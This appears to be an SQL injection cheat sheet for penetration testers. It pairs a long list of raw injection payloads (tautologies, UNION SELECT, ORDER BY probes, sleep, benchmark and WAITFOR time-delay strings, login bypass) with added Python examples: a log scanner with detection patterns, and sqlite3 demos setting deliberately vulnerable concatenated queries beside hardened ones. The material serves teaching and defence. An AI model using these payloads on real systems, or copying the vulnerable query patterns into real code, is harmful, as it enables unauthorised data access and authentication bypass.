SQL Injection
SQL payloads for your pentest
Identification
Manual
If you are lucky, you will see an internal database error that includes the parser's message for the broken SQL statement. Otherwise you see a generic internal database error, or a general error without any details.
In the case of blind SQL injection, you observe a different HTTP response in terms of content or byte count. In the worst case you need a payload that initiates a DNS/HTTP request (out-of-band), because nothing in the response itself changes.
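The identification signals above are what a tester looks for in responses; the same payload families leave recognisable traces in request logs on the defending side. The following is an added example (not part of the original cheat sheet) that decodes query parameters from constructed access-log lines and flags the indicator families listed on this page: unbalanced quotes, trailing comment markers, OR 1=1 tautologies, ORDER BY n probes, UNION SELECT, and the time-delay functions (sleep, pg_sleep, benchmark, WAITFOR DELAY). The log format, the parameter names and all sample values are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not real traffic). The first request is
# benign; the others carry payload families from the list on this page,
# URL-encoded the way they would appear in a web server log.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /items?id=42 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /items?id=42%27 HTTP/1.1" 500 88
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /items?id=1%27+ORDER+BY+3--%2B HTTP/1.1" 500 88
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /items?id=-1%27+UNION+SELECT+1%2C2%2C3--%2B HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /items?id=1+or+sleep%285%29%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /items?id=1%27%3Bwaitfor+delay+%270%3A0%3A5%27-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:16 +0000] "GET /login?user=admin%27+OR+1%3D1+--+&pass=x HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')

# Indicator families, each matched against the *decoded* parameter value.
PATTERNS = {
    # sleep()/pg_sleep()/benchmark() and WAITFOR DELAY: time-based blind probes
    "time_delay": re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    # UNION ... SELECT: result-set injection once the column count is known
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    # ORDER BY n: probing for the number of columns
    "order_by": re.compile(r"\border\s+by\s+\d", re.I),
    # OR 1=1 style tautologies, numeric or quoted on either side of the =
    "tautology": re.compile(
        r"\b(?:or|and)\s+(?:\d+|'[^']*'|\"[^\"]*\")\s*=\s*(?:\d+|'[^']*'|\"[^\"]*\")", re.I),
    # trailing comment marker used to discard the rest of the statement
    "comment_terminator": re.compile(r"(?:--|#|/\*)\s*\+?$"),
}


def classify_value(value: str) -> list:
    """Return the indicator families present in one decoded parameter value."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(value)]
    # A lone quote is the most basic probe (the A' case): check quote parity
    if value.count("'") % 2 == 1 or value.count('"') % 2 == 1:
        hits.append("unbalanced_quote")
    return hits


def scan_log(text: str) -> list:
    """Scan access-log text; return one finding per parameter that matches."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl performs the percent- and plus-decoding for us
        for name, value in parse_qsl(query, keep_blank_values=True):
            families = classify_value(value)
            if families:
                findings.append({"line": line_no, "param": name,
                                 "value": value, "families": families})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {', '.join(f['families'])}")
```

The matcher works on decoded values on purpose: the %27, %2B and %23 encodings in the list above would otherwise hide the quote, the trailing + and the # comment marker. Expect false positives on free-text fields (a product description can legitimately contain "--"), so treat the families as triage signals and weight the time-delay and UNION SELECT hits highest.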
A'
A' OR 1=1 -- 
A' AND 1=0 -- 
(Both payloads end with a space after the -- comment marker.)
Automation - Payloads
Identify SQL injection on your data input: trigger an error or change the returned data set.
'
''
`
``
,
"
""
'
"
`
')
")
`)
'))
"))
`))
)
/
//
\
\\
;
||
%22
%27
%3B
*
1 or 1=1 --
1' or 1=1 --
' OR 1=1--
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
+
%
@variable local variable
@@variable global variable
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
Columns - Order by
A reference to a non-existent column position in ORDER BY n raises an error. With this technique you determine the number of columns in the data set that is rendered on a specific web page.
Make sure there is a space after the comment marker (-- ) so that the rest of the SQL statement appended by the application (and processed by the backend) is commented out.
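The error that ORDER BY n triggers is the same error a defender should expect to see in application logs when a sort parameter is concatenated into the statement. The following is an added example (not from the original cheat sheet) using Python's sqlite3 module: a constructed three-column table, a vulnerable listing function that concatenates the sort parameter, and a hardened version that validates against an allow-list, which is the usual defence because ORDER BY cannot take a bound parameter. The table, column names and rows are constructed for the demonstration.

```python
import sqlite3

# Allow-list of sortable columns and directions. ORDER BY cannot be a bound
# parameter, so validation against a fixed set is the standard defence.
ALLOWED_SORT_COLUMNS = {"name", "price"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table with three columns (demo data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "widget", 9.5), (2, "gadget", 19.0), (3, "gizmo", 4.25)])
    return conn


def list_products_vulnerable(conn, sort: str) -> list:
    """Vulnerable pattern: the sort parameter is concatenated into the statement."""
    sql = "SELECT id, name, price FROM products ORDER BY " + sort
    return conn.execute(sql).fetchall()


def list_products_safe(conn, sort: str, direction: str = "ASC") -> list:
    """Hardened pattern: reject anything outside the allow-list before SQL runs."""
    if sort not in ALLOWED_SORT_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("invalid sort option")
    sql = f"SELECT id, name, price FROM products ORDER BY {sort} {direction}"
    return conn.execute(sql).fetchall()


def attempt(fn, *args) -> tuple:
    """Run fn and report ('ok', rows) or ('error', message) without raising."""
    try:
        return ("ok", fn(*args))
    except (sqlite3.OperationalError, ValueError) as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    # ORDER BY 3 is within range, ORDER BY 4 is not: the database error text
    # names the valid range, which is how the column count leaks
    print(attempt(list_products_vulnerable, conn, "3"))
    print(attempt(list_products_vulnerable, conn, "4"))
    # the hardened version refuses numeric positions and any injected text
    print(attempt(list_products_safe, conn, "4"))
    print(attempt(list_products_safe, conn, "price", "DESC"))
```

Two things to take from the run: the vulnerable function's error for ORDER BY 4 states the valid range (1 to 3), so returning raw database errors to the client hands over the column count; the safe function fails with its own ValueError before any SQL is built, so nothing about the schema is exposed.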
Column's Data type
Once you know the number of columns, determine the data type of each column so that a string payload lands in a column of compatible type within the data set.
Oracle Database - table dual
Oracle Database requires a FROM clause in every SELECT statement. Use the DUAL table when you don't know a table name or simply want to evaluate an expression in the SQL statement.
Database version
Tables and columns - Query data dictionary
Comments
SQL comments allow you to suppress the rest of the SQL statement after injection.
Comments type per DB platform
SQL Functions
Specific features and statements per database platform are listed in the SQL injection cheat sheet at Burp Web Security Academy.
Cheat Sheets
Cheat sheets for manual SQL injection testing
SQLI - Authentication Bypass
A special case of SQL injection in login scenarios allows privilege escalation.
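The login case ties the Identification section and this one together: the same concatenated query that returns a parser error for A' returns the first user row for A' OR 1=1 -- , and in many applications that first row is the administrator. The following is an added example (not from the original cheat sheet) using Python's sqlite3 module, with a constructed users table, the vulnerable concatenated login query beside the parameterized version, and a small attempt() wrapper that reports errors instead of raising. Usernames, roles and the demo passwords are constructed; the sha256 digest stands in for a real password hash only to keep the example self-contained.

```python
import hashlib
import sqlite3


def pw_hash(password: str) -> str:
    """Demo-only digest; a real system uses a dedicated password hash (argon2, bcrypt)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table; the admin row comes first (demo data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, pw_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", pw_hash("demo-admin-secret"), "admin"),
        (2, "alice", pw_hash("demo-alice-secret"), "user"),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Vulnerable: the username is concatenated straight into the WHERE clause."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    """Hardened: bound parameters keep quote characters inside the value."""
    sql = "SELECT username, role FROM users WHERE username = ? AND pw_hash = ?"
    return conn.execute(sql, (username, pw_hash(password))).fetchone()


def attempt(fn, *args) -> tuple:
    """Run fn and report ('ok', row) or ('error', message) without raising."""
    try:
        return ("ok", fn(*args))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    # A' breaks the statement (the parser error from the Identification section),
    # A' OR 1=1 --  turns the WHERE clause into a tautology and the first row wins
    for user in ("alice", "A'", "A' OR 1=1 -- "):
        print(f"{user!r:18} vulnerable: {attempt(login_vulnerable, conn, user, 'wrong')}")
        print(f"{'':18} safe:       {attempt(login_safe, conn, user, 'wrong')}")
```

With the parameterized query the quote and the comment marker stay inside the bound value, so A' is simply an unknown username (no error, no row) and the tautology never reaches the parser. Hashing the password before the query does not help the vulnerable version: the injection point is the username, and the comment marker discards the password check entirely.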
References
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://pentestmonkey.net/category/cheat-sheet/sql-injection
https://portswigger.net/web-security/sql-injection/cheat-sheet